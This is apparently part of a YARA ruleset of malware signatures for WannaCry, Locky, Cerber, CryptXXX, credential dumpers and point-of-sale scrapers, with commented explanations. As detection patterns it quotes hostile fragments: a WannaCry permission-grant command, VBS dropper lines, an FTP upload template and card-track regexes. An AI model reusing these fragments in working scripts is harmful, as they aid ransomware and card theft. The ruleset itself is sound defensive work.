        $s3 = " = WScript.CreateObject(\"WScript.Shell\")" ascii

    condition:
        // 0x4553 read little-endian is the byte pair 'S' (0x53), 'E' (0x45),
        // i.e. the file must begin with "SE"; size cap keeps this to tiny scripts
        uint16(0) == 0x4553
        and filesize < 1KB
        and $x1 and $x2 and $s3
}
rule NHS_Strain_Wanna: NHS_Strain_Wanna
{
    meta:
        description = "Detection for worm-strain bundle of Wcry, DOublePulsar"
        MD5 = "db349b97c37d22f5ea1d1841e3c89eb4"
        SHA1 = "e889544aff85ffaf8b0d0da705105dee7c97fe26"
        SHA256 = "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"
        INFO = "Looks for specific offsets of c.wnry and t.wnry strings"

    strings:
        $cwnry = { 63 2e 77 6e 72 79 }    // "c.wnry"
        $twnry = { 74 2e 77 6e 72 79 }    // "t.wnry"

    condition:
        // Fixed-offset match for the single build identified by the hashes above;
        // any relinking or repacking shifts these offsets and breaks the rule.
        $twnry at 267672
        and $cwnry at 262324
        and $cwnry at 284970
}
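// WannaCry PE dropper/encryptor. Two independent paths: one high-confidence string
// ($x*) together with one supporting string ($s*), or three of the opcode fragments ($op*).
// The explicit parentheses make the and/or grouping visible (and binds tighter than or).
// The original $x9 was byte-identical to $x1 and has been dropped; "1 of ($x*)" is unaffected.
rule WannaCry_Ransomware {
    meta:
        description = "Detects WannaCry Ransomware"
        author = "Florian Roth (with the help of binar.ly)"
        reference = "https://goo.gl/HG2j5T"
        date = "2017-05-12"
        hash1 = "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
    strings:
        $x1 = "icacls . /grant Everyone:F /T /C /Q" fullword ascii
        $x2 = "taskdl.exe" fullword ascii
        $x3 = "tasksche.exe" fullword ascii
        $x4 = "Global\\MsWinZonesCacheCounterMutexA" fullword ascii
        $x5 = "WNcry@2ol7" fullword ascii
        $x6 = "www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com" ascii
        $x7 = "mssecsvc.exe" fullword ascii
        $x8 = "C:\\%s\\qeriuwjhrf" fullword ascii

        $s1 = "C:\\%s\\%s" fullword ascii
        $s2 = "<!-- Windows 10 --> " fullword ascii
        $s3 = "cmd.exe /c \"%s\"" fullword ascii
        $s4 = "msg/m_portuguese.wnry" fullword ascii
        $s5 = "\\\\192.168.56.20\\IPC$" fullword wide
        $s6 = "\\\\172.16.99.5\\IPC$" fullword wide

        $op1 = { 10 ac 72 0d 3d ff ff 1f ac 77 06 b8 01 00 00 00 }
        $op2 = { 44 24 64 8a c6 44 24 65 0e c6 44 24 66 80 c6 44 }
        $op3 = { 18 df 6c 24 14 dc 64 24 2c dc 6c 24 5c dc 15 88 }
        $op4 = { 09 ff 76 30 50 ff 56 2c 59 59 47 3b 7e 0c 7c }
        $op5 = { c1 ea 1d c1 ee 1e 83 e2 01 83 e6 01 8d 14 56 }
        $op6 = { 8d 48 ff f7 d1 8d 44 10 ff 23 f1 23 c1 }
    condition:
        uint16(0) == 0x5a4d and filesize < 10000KB and ( ( 1 of ($x*) and 1 of ($s*) ) or 3 of ($op*) )
}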
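// WannaCry dropper: MZ header, under 4MB, and all four artefacts present
// (command template, tasksche.exe, the icacls grant line and the global mutex name).
rule WannaCry_Ransomware_Dropper
{
    meta:
        description = "WannaCry Ransomware Dropper"
        reference = "https://www.cylance.com/en_us/blog/threat-spotlight-inside-the-wannacry-attack.html"
        date = "2017-05-12"

    strings:
        $s1 = "cmd.exe /c \"%s\"" fullword ascii
        $s2 = "tasksche.exe" fullword ascii
        $s3 = "icacls . /grant Everyone:F /T /C /Q" fullword ascii
        $s4 = "Global\\MsWinZonesCacheCounterMutexA" fullword ascii

    condition:
        uint16(0) == 0x5a4d and filesize < 4MB and all of them
}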
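// WannaCry batch helper: a file under 1KB whose first two bytes read "@e"
// (0x6540 little-endian, i.e. "@echo ...") and which contains any one of the
// lines that assemble and run m.vbs.
rule WannCry_BAT {
    meta:
        description = "Detects WannaCry Ransomware BATCH File"
        author = "Florian Roth"
        reference = "https://goo.gl/HG2j5T"
        date = "2017-05-12"
        hash1 = "f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077"
    strings:
        $s1 = "@.exe\">> m.vbs" ascii
        $s2 = "cscript.exe //nologo m.vbs" fullword ascii
        $s3 = "echo SET ow = WScript.CreateObject(\"WScript.Shell\")> " ascii
        $s4 = "echo om.Save>> m.vbs" fullword ascii
    condition:
        ( uint16(0) == 0x6540 and filesize < 1KB and 1 of them )
}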
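// Sample-specific rule: the NUL-prefixed strings "taskdl" and "taskse" must sit at two
// fixed offsets, so only this exact build matches (no tolerance for repacking).
rule Wanna_Sample_84c82835a5d21bbcf75a61706d8ab549: Wanna_Sample_84c82835a5d21bbcf75a61706d8ab549
{
    meta:
        description = "Specific sample match for WannaCryptor"
        MD5 = "84c82835a5d21bbcf75a61706d8ab549"
        SHA1 = "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467"
        SHA256 = "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
        INFO = "Looks for 'taskdl' and 'taskse' at known offsets"

    strings:
        $taskdl = { 00 74 61 73 6b 64 6c } // "\0taskdl"
        $taskse = { 00 74 61 73 6b 73 65 } // "\0taskse"

    condition:
        $taskdl at 3419456 and $taskse at 3422953
}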
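// WannaCry SMB worm component. Requires every string: the SMB dialect names and the
// two placeholder tokens used by the referenced exploit code, plus three substrings of
// the embedded payload. There is no header or filesize gate, so this is string-only.
rule MS17_010_WanaCry_worm {
    meta:
        description = "Worm exploiting MS17-010 and dropping WannaCry Ransomware"
        author = "Felipe Molina (@felmoltor)"
        reference = "https://www.exploit-db.com/exploits/41987/"
        date = "2017/05/12"
    strings:
        $ms17010_str1="PC NETWORK PROGRAM 1.0"
        $ms17010_str2="LANMAN1.0"
        $ms17010_str3="Windows for Workgroups 3.1a"
        $ms17010_str4="__TREEID__PLACEHOLDER__"
        $ms17010_str5="__USERID__PLACEHOLDER__"
        // fragments of the embedded payload blob (base64-looking, not decoded here)
        $wannacry_payload_substr1 = "h6agLCqPqVyXi2VSQ8O6Yb9ijBX54j"
        $wannacry_payload_substr2 = "h54WfF9cGigWFEx92bzmOd0UOaZlM"
        $wannacry_payload_substr3 = "tpGFEoLOU6+5I78Toh/nHs/RAP"

    condition:
        all of them
}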
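// WannaCry ransom note text file: under 2KB, first two bytes read "Q:" (0x3a51
// little-endian) and both FAQ lines present.
rule WannaCry_RansomNote {
    meta:
        description = "Detects WannaCry Ransomware Note"
        author = "Florian Roth"
        reference = "https://goo.gl/HG2j5T"
        date = "2017-05-12"
        hash1 = "4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e"
    strings:
        $s1 = "A:  Don't worry about decryption." fullword ascii
        $s2 = "Q:  What's wrong with my files?" fullword ascii
    condition:
        ( uint16(0) == 0x3a51 and filesize < 2KB and all of them )
}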
// https://otx.alienvault.com/pulse/594aa278d5ddc51c579520ef
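// Locky: all seven byte patterns must be present. $a1..$a6 are UTF-16LE text chunks
// (".locky", "_Locky" and consecutive pieces of "_recover_instructions.txt");
// $a7 is the ASCII registry path "Software\Locky" with its terminating NUL.
// No MZ or filesize gate.
rule Locky_Ransomware_2: ransom {
    meta:
        description = "Regla para detectar RANSOM.LOCKY"
        author = "CCN-CERT"
        version = "1.0"
    strings:
        $a1 = { 2E 00 6C 00 6F 00 63 00 6B 00 79 00 00 } // ".locky" (wide)
        $a2 = { 00 5F 00 4C 00 6F 00 63 00 6B 00 79 00 } // "_Locky" (wide)
        $a3 = { 5F 00 72 00 65 00 63 00 6F 00 76 00 65 } // "_recove"
        $a4 = { 00 72 00 5F 00 69 00 6E 00 73 00 74 00 } // "r_inst"
        $a5 = { 72 00 75 00 63 00 74 00 69 00 6F 00 6E } // "ruction"
        $a6 = { 00 73 00 2E 00 74 00 78 00 74 00 00 }    // "s.txt"
        $a7 = { 53 6F 66 74 77 61 72 65 5C 4C 6F 63 6B 79 00 } // "Software\Locky\0"
    condition:
        all of them
}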
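// Locky by two opcode sequences (addresses are where they were observed in the
// referenced sample). The description notes it also fires on Win32/Kuluoz, so
// treat hits as a family-level signal rather than a Locky-only verdict.
rule Locky_Ransomware : ransom {
    meta:
        description = "Detects Locky Ransomware (matches also on Win32/Kuluoz)"
        author = "Florian Roth (with the help of binar.ly)"
        reference = "https://goo.gl/qScSrE"
        date = "2016-02-17"
        hash = "5e945c1d27c9ad77a2b63ae10af46aee7d29a6a43605a9bfbf35cebbcff184d8"
    strings:
        $o1 = { 45 b8 99 f7 f9 0f af 45 b8 89 45 b8 } // address=0x4144a7
        $o2 = { 2b 0a 0f af 4d f8 89 4d f8 c7 45 } // address=0x413863
    condition:
        all of ($o*)
}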
// https://otx.alienvault.com/pulse/58506bbbb3228a06556d0496
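// GoldenEye macro document: an OLE2 container (first bytes D0 CF, read as 0xcfd0
// little-endian) under 4000KB holding either of the two embedded JScript lines.
rule GoldenEye_Ransomware_XLS {
    meta:
        description = "GoldenEye XLS with Macro - file Schneider-Bewerbung.xls"
        author = "Florian Roth"
        reference = "https://goo.gl/jp2SkT"
        date = "2016-12-06"
        hash1 = "2320d4232ee80cc90bacd768ba52374a21d0773c39895b88cdcaa7782e16c441"
    strings:
        $x1 = "fso.GetTempName();tmp_path = tmp_path.replace('.tmp', '.exe')" fullword ascii
        $x2 = "var shell = new ActiveXObject('WScript.Shell');shell.run(t'" fullword ascii
    condition:
        ( uint16(0) == 0xcfd0 and filesize < 4000KB and 1 of them )
}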
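// GoldenEye dropper masquerading as Sysinternals ZoomIt: a small PE that carries the
// ZoomIt banner ($s1) but lacks the author string ($n1) a genuine build contains.
rule GoldenEyeRansomware_Dropper_MalformedZoomit {
    meta:
        description = "Auto-generated rule - file b5ef16922e2c76b09edd71471dd837e89811c5e658406a8495c1364d0d9dc690"
        author = "Florian Roth"
        reference = "https://goo.gl/jp2SkT"
        date = "2016-12-06"
        hash1 = "b5ef16922e2c76b09edd71471dd837e89811c5e658406a8495c1364d0d9dc690"
    strings:
        $s1 = "ZoomIt - Sysinternals: www.sysinternals.com" fullword ascii
        $n1 = "Mark Russinovich" wide
    condition:
        ( uint16(0) == 0x5a4d and filesize < 800KB and $s1 and not $n1 )
}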
// https://otx.alienvault.com/pulse/59480f989cf28a630421691d
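// Erebus (Linux ransomware per ref1): both the GUID-named log path and the marker
// sentence must be present. No file-type gate, which is appropriate for an ELF target.
rule Erebus: ransom
{
    meta:
        description = "Erebus Ransomware"
        author = "Joan Soriano / @joanbtl"
        date = "2017-06-23"
        version = "1.0"
        MD5 = "27d857e12b9be5d43f935b8cc86eaabf"
        SHA256 = "0b7996bca486575be15e68dba7cbd802b1e5f90436ba23f802da66292c8a055f"
        ref1 = "http://blog.trendmicro.com/trendlabs-security-intelligence/erebus-resurfaces-as-linux-ransomware/"
    strings:
        $a = "/{5f58d6f0-bb9c-46e2-a4da-8ebc746f24a5}//log.log"
        $b = "EREBUS IS BEST."
    condition:
        all of them
}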
// https://otx.alienvault.com/pulse/59761ec9a87db728f0caeede
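// Cerber 5b by a single wildcarded opcode pattern (nibble wildcards such as ?8 and 4?
// plus a 0-6 byte jump). No MZ or filesize gate, so the pattern alone decides.
rule cerber5b {
    meta:
        author = "pekeinfo"
        date = "2016-12-20"
        description = "Cerber5b"
    strings:
        $a={8B ?? ?8 ?? 4? 00 83 E? 02 89 ?? ?8 ?? 4? 00 68 ?C ?9 4? 00 [0-6] ?? ?? ?? ?? ?? ?8 ?? 4? 00 5? FF 15 ?? ?9 4? 00 89 45 ?4 83 7D ?4 00 75 02 EB 12 8B ?? ?0 83 C? 06 89 ?? ?0 B? DD 03 00 00 85}
    condition:
        $a
}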
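// Cerber 5 by a single wildcarded opcode pattern; "1 of them" with one string
// is equivalent to "$a". No MZ or filesize gate.
rule cerber5 {
    meta:
        author = "pekeinfo"
        date = "2016-12-02"
        description = "Cerber5"
    strings:
        $a = {83 C4 04 A3 ?? ?? ?? 00 C7 45 ?? ?? ?? ?? 00 8B ?? ?? C6 0? 56 8B ?? ?? 5? 68 ?? ?? 4? 00 FF 15 ?? ?? 4? 00 50 FF 15 ?? ?? 4? 00 A3 ?? ?? 4? 00 68 1D 10 00 00 E8 ?? ?? FF FF 83 C4 04 ?? ?? ??}

    condition:
        1 of them
}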
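// Cerber 4 by a single opcode pattern that fixes the image base nibbles (43 00) and
// wildcards the low address bytes. No MZ or filesize gate.
rule cerber4 {
    meta:
        author = "pekeinfo"
        date = "2016-09-09"
        description = "Cerber4"
    strings:
        $a = {8B 0D ?? ?? 43 00 51 8B 15 ?? ?? 43 00 52 E8 C9 04 00 00 83 C4 08 89 45 FC A1 ?? ?? 43 00 3B 05 ?? ?? 43 00 72 02}

    condition:
        1 of them
}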
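// Cerber 3: either of two opcode patterns is enough. $a is fully literal; $b
// wildcards five bytes around a push/call pair. No MZ or filesize gate.
rule cerber3 {
    meta:
        author = "pekeinfo"
        date = "2016-09-09"
        description = "Cerber3 "
    strings:
        $a = {00 6A 00 68 80 00 00 00 6A 03 6A 00 6A 03 6A  01 8B 85}
        $b = {68 3B DB 00 00 ?? ?? ?? ?? 00 ?? FF 15}

    condition:
        1 of them
}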
// https://otx.alienvault.com/pulse/5977b327f7cda563fc57bdb7
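// CryptXXX dropper: both byte patterns required. $a is the ASCII token "Pe1WXCFvYbHo5";
// $b is the UTF-16LE path "C:\BIER\QmkNRLF" with its terminating NUL. No MZ gate.
rule Ransom_CryptXXX_Dropper
{
    /*
      Rule to detect the Ransom.CryptXXX dropper with MD5 d01fd2bb8c6296d51be297978af8b3a1
    */
    meta:
        description = "Regla para detectar RANSOM.CRYPTXXX"
        author      = "CCN-CERT"
        version     = "1.0"
    strings:
        $a = { 50 65 31 57 58 43 46 76 59 62 48 6F 35 }
        $b = { 43 00 3A 00 5C 00 42 00 49 00 45 00 52 00 5C 00 51 00 6D 00 6B 00 4E 00 52 00 4C 00 46 00 00 }
    condition:
        all of them
}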
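// CryptXXX payload (the unpacked code rather than the dropper): every listed 16-byte
// pattern must be present. The original $x was byte-identical to $n and has been
// removed; under "all of them" the set of files matched is unchanged. No MZ gate.
rule Ransom_CryptXXX_Real
{
    /*
      Rule to detect the Ransom.CryptXXX code outside the dropper, MD5 ae06248ab3c02e1c2ca9d53b9a155199
    */
    meta:
        description = "Regla para detectar Ransom.CryptXXX original"
        author      = "CCN-CERT"
        version     = "1.0"
    strings:
        $a = { 52 59 47 40 4A 41 59 5D 52 00 00 00 FF FF FF FF }
        $b = { 06 00 00 00 52 59 47 40 40 5A 00 00 FF FF FF FF }
        $c = { 0A 00 00 00 52 5C 4B 4D 57 4D 42 4B 5C 52 00 00 }
        $d = { FF FF FF FF 0A 00 00 00 52 5D 57 5D 5A 4B 43 70 }
        $e = { 3F 52 00 00 FF FF FF FF 06 00 00 00 52 4C 41 41 }
        $f = { 5A 52 00 00 FF FF FF FF 0A 00 00 00 52 5C 4B 4D }
        $g = { 41 58 4B 5C 57 52 00 00 FF FF FF FF 0E 00 00 00 }
        $h = { 52 2A 5C 4B 4D 57 4D 42 4B 20 4C 47 40 52 00 00 }
        $i = { FF FF FF FF 0A 00 00 00 52 5E 4B 5C 48 42 41 49 }
        $j = { 5D 52 00 00 FF FF FF FF 05 00 00 00 52 4B 48 47 }
        $k = { 52 00 00 00 FF FF FF FF 0C 00 00 00 52 4D 41 40 }
        $l = { 48 47 49 20 43 5D 47 52 00 00 00 00 FF FF FF FF }
        $m = { 0A 00 00 00 52 5E 5C 41 49 5C 4F 70 3F 52 00 00 }
        $n = { FF FF FF FF 0A 00 00 00 52 5E 5C 41 49 5C 4F 70 }
        $o = { 3C 52 00 00 FF FF FF FF 08 00 00 00 52 49 41 41 }
        $p = { 49 42 4B 52 00 00 00 00 FF FF FF FF 06 00 00 00 }
        $q = { 52 5A 4B 43 5E 52 00 00 FF FF FF FF 08 00 00 00 }
        $v = { 52 48 3A 4C 4D 70 3F 52 00 00 00 00 FF FF FF FF }
        $w = { 0A 00 00 00 52 4F 42 42 5B 5D 4B 70 3F 52 00 00 }
        $y = { 3F 52 00 00 FF FF FF FF 0A 00 00 00 52 5E 5C 41 }
        $z = { 49 5C 4F 70 3C 52 00 00 FF FF FF FF 09 00 00 00 }
        $aa = { 52 4F 5E 5E 4A 4F 5A 4F 52 00 00 00 FF FF FF FF }
        $ab = { 0A 00 00 00 52 5E 5C 41 49 5C 4F 70 3D 52 00 00 }
        $ac = { FF FF FF FF 08 00 00 00 52 5E 5B 4C 42 47 4D 52 }

    condition:
        all of them
}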
// https://otx.alienvault.com/pulse/5674426c4637f25637d044fc
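// SpyGate v2.9 RAT: all five command/feature names must be present (four of them as
// UTF-16). No MZ gate despite the "exe" filetype in meta, so the strings alone decide.
rule SpyGate_v2_9
{
    meta:
        date = "2014/09"
        maltype = "Spygate v2.9 Remote Access Trojan"
        filetype = "exe"
        reference = "https://blogs.mcafee.com/mcafee-labs/middle-east-developer-spygate-struts-stuff-online"
    strings:
        $1 = "shutdowncomputer" wide
        $2 = "shutdown -r -t 00" wide
        $3 = "blockmouseandkeyboard" wide
        $4 = "ProcessHacker"
        $5 = "FileManagerSplit" wide
    condition:
        all of them
}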
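// Credential-dump tooling (pwdump6/fgdump family): a PE carrying at least three of the
// six tool names. Note $s3 ("failed: %d") is a generic format string and can count
// towards the threshold on unrelated binaries.
rule dump_tool
{
    meta:
        author = "@patrickrolsen"
        reference = "Related to pwdump6 and fgdump tools"
    strings:
        $s1 = "lsremora"
        $s2 = "servpw"
        $s3 = "failed: %d"
        $s4 = "fgdump"
        $s5 = "fgexec"
        $s6 = "fgexecpipe"
    condition:
        uint16(0) == 0x5A4D and 3 of ($s*)
}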
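// POS memory-scraper heuristic: a PE that names a regex engine ($n*) and embeds at
// least one card-track-style regex literal ($s*). $n3 ("regex") is case-sensitive and
// common in legitimate software, so the $s* hit carries most of the signal.
rule regex_pos
{
    meta:
        author = "@patrickrolsen"
        reference = "POS malware - Regex"
    strings:
        $n1 = "REGEXEND" nocase
        $n2 = "RegExpr" nocase
        $n3 = "regex"
        $s4 = "[1-5][0-9]{14}=(?!1201|1202|1203|1204|11|10|09|08|07|06|05|04|03|02)[0-9]{5}[0-9]*"
        $s5 = "[47][0-9]{13}=(?!1201|1202|1203|1204|11|10|09|08|07|06|05|04|03|02)[0-9]{5}[0-9]*"
        $s6 = "(?:0[0-5]|[68][0-9])[0-9]{11}=(?!1201|1202|1203|1204|11|10|09|08|07|06|05|04|03|02)[0-9]{5}[0-9]*"
        $s7 = "(?:011|5[0-9]{2})[0-9]{12}=(?!1201|1202|1203|1204|11|10|09|08|07|06|05|04|03|02)[0-9]{5}[0-9]*"
        $s8 = "(?:2131|1800|35\\d{3})\\d{11}=(?!1201|1202|1203|1204|11|10|09|08|07|06|05|04|03|02)[0-9]{5}[0-9]*"
        $s9 = "([0-9]{15,16}[D=](0[7-9]|1[0-5])((0[1-9])|(1[0-2]))[0-9]{8,30})"
        $s10 = "((b|B)[0-9]{13,19}\\^[A-Za-z\\s]{0,30}\\/[A-Za-z\\s]{0,30}\\^(0[7-9]|1[0-5])((0[1-9])|(1[0-2]))[0-9\\s]{3,50}[0-9]{1})"
        $s11 = "[0-9]*\\^[a-zA-Z]*/[a-zA-Z ]*\\^[0-9]*"
        $s12 = "\\d{15,19}=\\d{13,}"
        $s13 = "\\;?[3-9]{1}[0-9]{12,19}[D=\\u0061][0-9]{10,30}\\??"
        $s14 = "[0-9]{12}(?:[0-9]{3})?=(?!1201|1202|1203|1204|11|10|09|08|07|06|05|04|03|02)[0-9]{5}[0-9]*"
    condition:
        uint16(0) == 0x5A4D and 1 of ($n*) and 1 of ($s*)
}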
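// Unattributed POS sample: a PE containing all three UTF-16 strings ("3 of ($s*)"
// with exactly three strings is "all of them"). The rule name is kept for
// compatibility with anything that references it.
rule unknown
{
    meta:
        author = "@patrickrolsen"
        reference = "Unknown POS"
    strings:
        $s1 = "a.exe" wide
        $s2 = "Can anyone test" wide
        $s3 = "I m in computer class now" wide
    condition:
        uint16(0) == 0x5A4D and 3 of ($s*)
}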
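// Suspected POS exfiltration component: a PE with seven of the eight strings. Most
// are generic SMTP verbs/headers, so the threshold leans on the specific ones
// ("test335.txt" wide, "/c del") to keep mail clients from matching.
rule monitor_tool_pos
{
    meta:
        author = "@patrickrolsen"
        reference = "POS malware - Monitoring Tool??"
    strings:
        $s1 = "RCPT TO"
        $s2 = "MAIL FROM"
        $s3 = "AUTH LOGIN"
        $s4 = "Reply-To"
        $s5 = "X-Mailer"
        $s6 = "crypto"
        $s7 = "test335.txt" wide
        $s8 = "/c del"
    condition:
        uint16(0) == 0x5A4D and 7 of ($s*)
}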
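// POS data uploader (Target-campaign component per reference): a PE with all four
// strings - the service-start template, the ftp script invocation, the dump file
// name format and the "\uploader\" path fragment.
rule pos_uploader
{
    meta:
        author = "@patrickrolsen"
        maltype = "Point of Sale (POS) Malware"
        reference = "http://blogs.mcafee.com/mcafee-labs/analyzing-the-target-point-of-sale-malware"
        version = "0.1"
        description = "Testing the base64 encoded file in sys32"
        date = "01/30/2014"
    strings:
        $s1 = "cmd /c net start %s"
        $s2 = "ftp -s:%s"
        $s3 = "data_%d_%d_%d_%d_%d.txt"
        $s4 = "\\uploader\\"
    condition:
        uint16(0) == 0x5A4D and all of ($s*)
}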
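// Suspected keylogger: a PE carrying both UTF-16 strings (the executable name and a
// distinctive word sequence).
rule lacy_keylogger
{
    meta:
        author = "@patrickrolsen"
        reference = "Appears to be a form of keylogger."
    strings:
        $s1 = "Lacy.exe" wide
        $s2 = "Bldg Chive Duel Rip Query" wide
    condition:
        uint16(0) == 0x5A4D and all of ($s*)
}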
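// POS malware by its drop path: a PE containing "\system32\winxml.dll". The other
// candidate strings are left commented out, so "all of ($s*)" currently means $s1 alone.
rule winxml_dll
{
    meta:
        author = "@patrickrolsen"
        maltype = "Point of Sale (POS) Malware"
        reference = "ce0296e2d77ec3bb112e270fc260f274"
        version = "0.1"
        description = "Testing the base64 encoded file in sys32"
        date = "01/30/2014"
    strings:
        $s1 = "\\system32\\winxml.dll"
        //$s2 = "cmd /c net start %s"
        //$s3 = "=== pid:"
        //$s4 = "GOTIT"
        //$s5 = ".memdump"
        //$s6 = "POSWDS"
    condition:
        uint16(0) == 0x5A4D and (all of ($s*))
}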
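// POS malware by a single hard-coded HTTP request line ("GET /sets.txt") in a PE.
// One short string is a thin signal; corroborate hits with other rules.
rule sets_pos
{
    meta:
        author = "@patrickrolsen"
        reference = "POS malware - Sets"
    strings:
        $s1 = "GET /sets.txt"
    condition:
        uint16(0) == 0x5A4D and $s1
}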
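// SearchInject loader: a PE naming the tool, its "inject base:" log text and the
// Searcher.dll it loads (case-insensitive). All three required.
rule searchinject
{
    meta:
        author = "@patrickrolsen"
        reference = "Usage: SearchInject <PID1>[PID2][PID3] - It loads Searcher.dll (appears to be hard coded)"
    strings:
        $s1 = "SearchInject"
        $s2 = "inject base:"
        $s3 = "Searcher.dll" nocase
    condition:
        uint16(0) == 0x5A4D and all of ($s*)
}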
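// pstgdump (fgdump component): a PE with the tool path, the tool name and "Outlook".
// $s2 is a substring of $s1, so the effective requirement is $s1 and $s3.
rule pstgdump
{
    meta:
        author = "@patrickrolsen"
        reference = "pstgdump"
    strings:
        $s1 = "fgdump\\pstgdump"
        $s2 = "pstgdump"
        $s3 = "Outlook"
    condition:
        uint16(0) == 0x5A4D and all of ($s*)
}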
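// DiabloHorn process memory dumper: a PE with at least three of the six strings
// (author tag, tool banner, dump file name formats, executable name).
rule memdump_diablo
{
    meta:
        author = "@patrickrolsen"
        reference = "Process Memory Dumper - DiabloHorn"
    strings:
        $s1 = "DiabloHorn"
        $s2 = "Process Memory Dumper"
        $s3 = "pid-%s.dmp"
        $s4 = "Pid %d in not acessible" // SIC
        $s5 = "memdump.exe"
        $s6 = "%s-%d.dmp"
    condition:
        uint16(0) == 0x5A4D and 3 of ($s*)
}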
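// Identifies the Windows SYSOCMGR.EXE component by its UTF-16 name and description.
// This is a legitimate system binary; the rule is for inventory/triage, not a
// malware verdict on its own.
rule sysocmgr
{
    meta:
        author = "@patrickrolsen"
        reference = "System stand-alone Optional Component Manager - http://support.microsoft.com/kb/222444"
    strings:
        $s1 = "SYSOCMGR.EXE" wide
        $s2 = "System stand-alone Optional Component Manager" wide
    condition:
        uint16(0) == 0x5A4D and all of ($s*)
}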
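// Dexter (StarDust variant) POS malware: a PE with all four strings from Table 2 of
// the referenced report. The rule name's spelling is kept as published.
rule pos_malwre_dexter_stardust
{
    meta:
        author = "@patrickrolsen"
        maltype = "Dexter Malware - StarDust Variant"
        version = "0.1"
        description = "Table 2 arbornetworks.com/asert/wp-content/uploads/2013/12/Dexter-and-Project-Hook-Break-the-Bank.pdf"
        reference = "16b596de4c0e4d2acdfdd6632c80c070, 2afaa709ef5260184cbda8b521b076e1, and e3dd1dc82ddcfaf410372ae7e6b2f658"
        date = "12/30/2013"
    strings:
        $s1 = "ceh_3\\.\\ceh_4\\..\\ceh_6"
        $s2 = "Yatoed3fe3rex23030am39497403"
        $s3 = "Poo7lo276670173quai16568unto1828Oleo9eds96006nosysump7hove19"
        $s4 = "CommonFile.exe"
    condition:
        uint16(0) == 0x5A4D and all of ($s*)
}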
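// Project Hook POS malware: a PE with all four strings from Table 1 of the
// referenced report.
rule pos_malware_project_hook
{
    meta:
        author = "@patrickrolsen"
        maltype = "Project Hook"
        version = "0.1"
        description = "Table 1 arbornetworks.com/asert/wp-content/uploads/2013/12/Dexter-and-Project-Hook-Break-the-Bank.pdf"
        reference = "759154d20849a25315c4970fe37eac59"
        date = "12/30/2013"
    strings:
        $s1 = "CallImage.exe"
        $s2 = "BurpSwim"
        $s3 = "Work\\Project\\Load"
        $s4 = "WortHisnal"
    condition:
        uint16(0) == 0x5A4D and all of ($s*)
}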
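// POS scraper heuristic: a PE with three of four strings. "Track1"/"Track2" and
// "Data.txt" are short and generic, so the "RegExpr" hit is the main discriminator.
rule regexpr_pos
{
    meta:
        author = "@patrickrolsen"
        reference = "POS malware - RegExpr"
    strings:
        $s1 = "RegExpr" nocase
        $s2 = "Data.txt"
        $s3 = "Track1"
        $s4 = "Track2"
    condition:
        uint16(0) == 0x5A4D and 3 of ($s*)
}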
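// JackPOS: a PE containing either of two build-path (PDB) fragments left in the binary.
rule pos_jack
{
    meta:
        author = "@patrickrolsen"
        maltype = "Point of Sale (POS) Malware"
        version = "0.1"
        reference = "http://blog.spiderlabs.com/2014/02/jackpos-the-house-always-wins.html"
        date = "2/22/2014"
    strings:
        $pdb1 = "\\ziedpirate.ziedpirate-PC\\"
        $pdb2 = "\\sop\\sop\\"
    condition:
        uint16(0) == 0x5A4D and 1 of ($pdb*)
}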
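// POS malware: a PE with three of the five strings (marker word, dump log name,
// C2 URI path, the spoofed User-Agent and a firewall-rule format string).
// Identifiers skip $s5; that is harmless to "3 of ($s*)".
rule heistenberg_pos
{
    meta:
        author = "@patrickrolsen"
        reference = "POS Malware"
    strings:
        $s1 = "KARTOXA"
        $s2 = "dmpz.log"
        $s3 = "/api/process.php?xy="
        $s4 = "User-Agent: PCICompliant" // PCICompliant/3.33
        $s6 = "%s:*:Enabled:%s"
    condition:
        uint16(0) == 0x5A4D and 3 of ($s*)
}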
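// Magical Jelly Bean KeyFinder (licence-key recovery tool): a PE with two of its
// four component file names. Dual-use utility; a hit is a triage lead, not a verdict.
rule keyfinder_tool
{
    meta:
        author = "@patrickrolsen"
        reference = "Magical Jelly Bean KeyFinder"
    strings:
        $s1 = "chgxp.vbs"
        $s2 = "officekey.exe"
        $s3 = "findkey.exe"
        $s4 = "xpkey.exe"
    condition:
        uint16(0) == 0x5A4D and 2 of ($s*)
}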
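// POS scraper: a PE with two of three strings - a track-1 log format, an
// id/log POST parameter template and a track-2 regex literal.
rule reg_pos
{
    meta:
        author = "@patrickrolsen"
        reference = "POS malware - RegExpr"
    strings:
        $s1 = "T1_FOUND: %s"
        $s2 = "id=%s&log=%s"
        $s3 = "\\d{15,19}=\\d{13,}"
    condition:
        uint16(0) == 0x5A4D and 2 of ($s*)
}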
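// Generic POS-malware strings: a PE with three of six. "pid:" and "COMSPEC" are
// common in benign tooling, so hits that rely on them plus one more string may
// be false positives; the KAPTOXA/KARTOXA markers are the stronger evidence.
rule misc_pos
{
    meta:
        author = "@patrickrolsen"
        reference = "POS Malware"
    strings:
        $s1 = "KAPTOXA"
        $s2 = "cmd /c net start %s"
        $s3 = "pid:"
        $s4 = "%ADD%"
        $s5 = "COMSPEC"
        $s6 = "KARTOXA"
    condition:
        uint16(0) == 0x5A4D and 3 of ($s*)
}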
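// ChewBacca (Tor-based POS malware): a PE with all four strings - the tor usage
// line, the "tor_" prefix, the memory-scan routine name and the family marker.
rule pos_chewbacca
{
    meta:
        author = "@patrickrolsen"
        maltype = "Point of Sale (POS) Malware"
        reference = "https://www.securelist.com/en/blog/208214185/ChewBacca_a_new_episode_of_Tor_based_Malware"
        hashes = "21f8b9d9a6fa3a0cd3a3f0644636bf09, 28bc48ac4a92bde15945afc0cee0bd54"
        version = "0.2"
        description = "Testing the base64 encoded file in sys32"
        date = "01/30/2014"
    strings:
        $s1 = "tor -f <torrc>"
        $s2 = "tor_"
        $s3 = "umemscan"
        $s4 = "CHEWBAC"
    condition:
        uint16(0) == 0x5A4D and (all of ($s*))
}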
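// Target-breach tooling by build path: a PE whose PDB/path string contains
// "\Projects\Rescator" (case-insensitive).
rule pdb_strings_Rescator
{
    meta:
        author = "@patrickrolsen"
        maltype = "Target Attack"
        version = "0.3"
        description = "Rescator PDB strings within binaries"
        date = "01/30/2014"
    strings:
        $pdb1 = "\\Projects\\Rescator" nocase
    condition:
        uint16(0) == 0x5A4D and $pdb1
}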
